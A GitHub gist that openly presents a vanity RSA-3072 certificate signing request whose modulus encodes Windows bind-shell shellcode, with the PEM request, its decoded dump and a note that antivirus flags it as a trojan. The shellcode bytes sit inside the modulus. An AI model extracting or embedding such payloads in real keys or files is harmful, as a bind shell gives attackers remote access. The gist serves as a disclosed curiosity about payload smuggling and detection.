Last active
December 5, 2021 00:03
-
-
Save CBonnell/699b2c01121e07440e1cf42d0210eba1 to your computer and use it in GitHub Desktop.
Vanity RSA key with Windows bind shellcode in modulus
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
_ _ _, __, _, _ _ _, _ _, | |
| | / \ |_) |\ | | |\ | / _ | |
|/\| |~| | \ | \| | | \| \ / | |
~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ | |
This key is extremely weak and should not be used for anything | |
Vanity RSA-3072 key with Windows bind shellcode in modulus. DER encoding of the CSR below detected by ClamAV as a trojan: https://www.virustotal.com/gui/file/b757330297ddccd7ec1fdac846dc7a69b1e75541b53ba8b8a508b0370c7b23da/detection | |
-----BEGIN CERTIFICATE REQUEST----- | |
MIIDijCCAfICAQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUx | |
ITAfBgNVBAoMGEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDCCAaIwDQYJKoZIhvcN | |
AQEBBQADggGPADCCAYoCggGBALt40BHp2tjZdCT0WDHJsVkxWBODwAQDWHcy5FMV | |
Eer/wJEsi9bplEffo3krHMdMeLLL/W7CnVNZpjfDVxHId3eebfxYuoL5wJo1cn0B | |
m+cxFoL24omJdWf3qq5ziD/1bT2eqwba/0J6Y2tyWfZYpf4/C0Gg8v4tyTI91FH3 | |
p1b4aQhNJ4ouGZl8/GP6XNWoH6ibiLulPI9/OEXRcTRZhLCXoJnM/n834ijqVwHP | |
+B4e2NMFZ3P5Mrt2jHwv9ikPpTYuc94xw/6uSWTSOfHyx6AG0/Ya/gr+KL4aQpze | |
ARYnvSkc+H1HLGgGDiMx/n1Y6Ht2S/7bF1H63/+hvMVmS+ojhke059Vxdy4kSj2x | |
bxLystBVySMuwqVzssi3fWtVKbwm3fbj9iXGXK2cnRgIO7/S/5IYX0ib4HsDpTIR | |
JyslzUTbvbnNSNpWTFbVBIdIOmucKhVNvAtWBrXJRtD6aKZ26VIsJGIo4R2HsGaT | |
hY+HD88WKXYDVQwOPxesAIAAHQIDAQABoAAwDQYJKoZIhvcNAQELBQADggGBAF4t | |
WtTkpulZcl97KoMpbE5bAyvd8aGTG0rIMzoDx2aMyST7sQD92fSLz+XYEpiTAMH/ | |
0gH+WSX0J/NzQ34sG8mCg05TA4D30SdmnAw9sHbeRgwzoyHJbNHeniXkeLt4kAkX | |
9BrRs7stZQ5c5NiC+DnClZNZikWew02BROq/YqmoPFsnL5OGYQ4BPA0becSHIlve | |
XX7WQdf3DHHX+S/uDa2tRf7WeoHdM2A5DO9EEPf7L6oAKFdf+atkM/y8jHD4UDz/ | |
MgeCGAYpumjaS1hovzUAJ4Fh2meZ3C2H9hDny92FOKzbCAIvrC2eIrjn0/HHYSKE | |
hlInm6MQAF6IrAyxw0sE4muva+XcUFYdq0pjEOaG98iKJ8kcftJbdAwKsdb85r3b | |
iFFgCMJ2PEEoPnlZmGm+afuL09ls2RBPPOoozob3Pxzw63PgT+ipaXWfR6HjzeMQ | |
QJk8bAqFw0tE8auNoFKW+o+MLBSCikzNZ9J+dEdlYhJtVTi1nSCj2Z5q856CPg== | |
-----END CERTIFICATE REQUEST----- | |
Certificate Request: | |
Data: | |
Version: 1 (0x0) | |
Subject: C = AU, ST = Some-State, O = Internet Widgits Pty Ltd | |
Subject Public Key Info: | |
Public Key Algorithm: rsaEncryption | |
RSA Public-Key: (3072 bit) | |
Modulus: | |
00:bb:78:d0:11:e9:da:d8:d9:74:24:f4:58:31:c9: | |
b1:59:31:58:13:83:c0:04:03:58:77:32:e4:53:15: | |
11:ea:ff:c0:91:2c:8b:d6:e9:94:47:df:a3:79:2b: | |
1c:c7:4c:78:b2:cb:fd:6e:c2:9d:53:59:a6:37:c3: | |
57:11:c8:77:77:9e:6d:fc:58:ba:82:f9:c0:9a:35: | |
72:7d:01:9b:e7:31:16:82:f6:e2:89:89:75:67:f7: | |
aa:ae:73:88:3f:f5:6d:3d:9e:ab:06:da:ff:42:7a: | |
63:6b:72:59:f6:58:a5:fe:3f:0b:41:a0:f2:fe:2d: | |
c9:32:3d:d4:51:f7:a7:56:f8:69:08:4d:27:8a:2e: | |
19:99:7c:fc:63:fa:5c:d5:a8:1f:a8:9b:88:bb:a5: | |
3c:8f:7f:38:45:d1:71:34:59:84:b0:97:a0:99:cc: | |
fe:7f:37:e2:28:ea:57:01:cf:f8:1e:1e:d8:d3:05: | |
67:73:f9:32:bb:76:8c:7c:2f:f6:29:0f:a5:36:2e: | |
73:de:31:c3:fe:ae:49:64:d2:39:f1:f2:c7:a0:06: | |
d3:f6:1a:fe:0a:fe:28:be:1a:42:9c:de:01:16:27: | |
bd:29:1c:f8:7d:47:2c:68:06:0e:23:31:fe:7d:58: | |
e8:7b:76:4b:fe:db:17:51:fa:df:ff:a1:bc:c5:66: | |
4b:ea:23:86:47:b4:e7:d5:71:77:2e:24:4a:3d:b1: | |
6f:12:f2:b2:d0:55:c9:23:2e:c2:a5:73:b2:c8:b7: | |
7d:6b:55:29:bc:26:dd:f6:e3:f6:25:c6:5c:ad:9c: | |
9d:18:08:3b:bf:d2:ff:92:18:5f:48:9b:e0:7b:03: | |
a5:32:11:27:2b:25:cd:44:db:bd:b9:cd:48:da:56: | |
4c:56:d5:04:87:48:3a:6b:9c:2a:15:4d:bc:0b:56: | |
06:b5:c9:46:d0:fa:68:a6:76:e9:52:2c:24:62:28: | |
e1:1d:87:b0:66:93:85:8f:87:0f:cf:16:29:76:03: | |
55:0c:0e:3f:17:ac:00:80:00:1d | |
Exponent: 65537 (0x10001) | |
Attributes: | |
a0:00 | |
Signature Algorithm: sha256WithRSAEncryption | |
5e:2d:5a:d4:e4:a6:e9:59:72:5f:7b:2a:83:29:6c:4e:5b:03: | |
2b:dd:f1:a1:93:1b:4a:c8:33:3a:03:c7:66:8c:c9:24:fb:b1: | |
00:fd:d9:f4:8b:cf:e5:d8:12:98:93:00:c1:ff:d2:01:fe:59: | |
25:f4:27:f3:73:43:7e:2c:1b:c9:82:83:4e:53:03:80:f7:d1: | |
27:66:9c:0c:3d:b0:76:de:46:0c:33:a3:21:c9:6c:d1:de:9e: | |
25:e4:78:bb:78:90:09:17:f4:1a:d1:b3:bb:2d:65:0e:5c:e4: | |
d8:82:f8:39:c2:95:93:59:8a:45:9e:c3:4d:81:44:ea:bf:62: | |
a9:a8:3c:5b:27:2f:93:86:61:0e:01:3c:0d:1b:79:c4:87:22: | |
5b:de:5d:7e:d6:41:d7:f7:0c:71:d7:f9:2f:ee:0d:ad:ad:45: | |
fe:d6:7a:81:dd:33:60:39:0c:ef:44:10:f7:fb:2f:aa:00:28: | |
57:5f:f9:ab:64:33:fc:bc:8c:70:f8:50:3c:ff:32:07:82:18: | |
06:29:ba:68:da:4b:58:68:bf:35:00:27:81:61:da:67:99:dc: | |
2d:87:f6:10:e7:cb:dd:85:38:ac:db:08:02:2f:ac:2d:9e:22: | |
b8:e7:d3:f1:c7:61:22:84:86:52:27:9b:a3:10:00:5e:88:ac: | |
0c:b1:c3:4b:04:e2:6b:af:6b:e5:dc:50:56:1d:ab:4a:63:10: | |
e6:86:f7:c8:8a:27:c9:1c:7e:d2:5b:74:0c:0a:b1:d6:fc:e6: | |
bd:db:88:51:60:08:c2:76:3c:41:28:3e:79:59:98:69:be:69: | |
fb:8b:d3:d9:6c:d9:10:4f:3c:ea:28:ce:86:f7:3f:1c:f0:eb: | |
73:e0:4f:e8:a9:69:75:9f:47:a1:e3:cd:e3:10:40:99:3c:6c: | |
0a:85:c3:4b:44:f1:ab:8d:a0:52:96:fa:8f:8c:2c:14:82:8a: | |
4c:cd:67:d2:7e:74:47:65:62:12:6d:55:38:b5:9d:20:a3:d9: | |
9e:6a:f3:9e:82:3e |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment